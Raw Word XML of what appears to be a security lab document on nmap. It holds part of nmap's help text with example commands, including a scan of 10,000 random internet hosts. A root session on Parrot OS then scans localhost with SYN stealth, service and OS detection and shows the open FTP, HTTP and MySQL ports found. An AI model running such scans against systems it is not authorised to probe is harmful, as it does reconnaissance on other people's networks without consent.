        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --privileged: Assume that the user is fully privileged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3691C91D" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --unprivileged: Assume the user lacks raw socket privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD1E20" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -V: Print version number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD97B21" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  -h: Print this help summary page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34558219" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EXAMPLES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CBC24" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  nmap -v -A scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197AA0B9" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  nmap -v -sn 192.168.0.0/16 10.0.0.0/8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1074A56A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  nmap -v -iR 10000 -Pn -p 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA7C91" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="0057440B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5589B532" w14:textId="77777777" w:rsidR="005C7CA3" w:rsidRPr="002B24A4" w:rsidRDefault="00FA403C" w:rsidP="0057440B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="397CA27C" wp14:editId="7D724164">
            <wp:extent cx="4619625" cy="2762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5162" cy="2765561"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF915EF" w14:textId="77777777" w:rsidR="0057440B" w:rsidRPr="002B24A4" w:rsidRDefault="0057440B" w:rsidP="0057440B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CB3256" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1256F625" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00A627C8">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6930"/>
          <w:tab w:val="left" w:pos="8550"/>
        </w:tabs>
        <w:ind w:right="810"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2DA84F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>┌─[root@parrot]─[/home/megha]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9EA163" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>└──╼ #</w:t>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap -v -A 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA21FC5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Starting Nmap 7.70</w:t>
      </w:r>
      <w:r w:rsidR="00204651" w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( https://nmap.org ) at 2018-07-18 13:40 UC</w:t>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A98303" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NSE: Loaded 148 scripts for scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6713D7A3" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NSE: Script Pre-scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F448857" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating NSE at 16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F62AD" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Completed NSE at 16:24, 0.00s elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE93E12" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating NSE at 16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFF0D5C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Completed NSE at 16:24, 0.00s elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB06494" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating SYN Stealth Scan at 16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260F59A9" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scanning localhost (127.0.0.1) [1000 ports]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF5E58" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Discovered open port 80/tcp on 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03276B" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Discovered open port 3306/tcp on 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BF85C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Discovered open port 21/tcp on 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4395A5" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Completed SYN Stealth Scan at 16:24, 0.07s elapsed (1000 total ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0CBF0" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating Service scan at 16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792C7D71" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scanning 3 services on localhost (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD54E4A" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Completed Service scan at 16:24, 6.41s elapsed (3 services on 1 host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242938A3" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating OS detection (try #1) against localhost (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E9131" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NSE: Script scanning 127.0.0.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C4E5B0" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating NSE at 16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC3F18" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Completed NSE at 16:24, 3.06s elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD515C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Initiating NSE at 16:24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072727DE" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Completed NSE at 16:24, 0.00s elapsed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0431236E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Nmap scan report for localhost (127.0.0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C28D3C7" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Host is up (0.000088s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7551688F" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Not shown: 997 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F252C1C" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PORT     STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601A193E" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>21/tcp   open  ftp     vsftpd 3.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64474F04" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>80/tcp   open  http    Apache httpd 2.4.29 ((Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF3116" w14:textId="77777777" w:rsidR="00AD4DF4" w:rsidRPr="002B24A4" w:rsidRDefault="00AD4DF4" w:rsidP="00AD4DF4">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
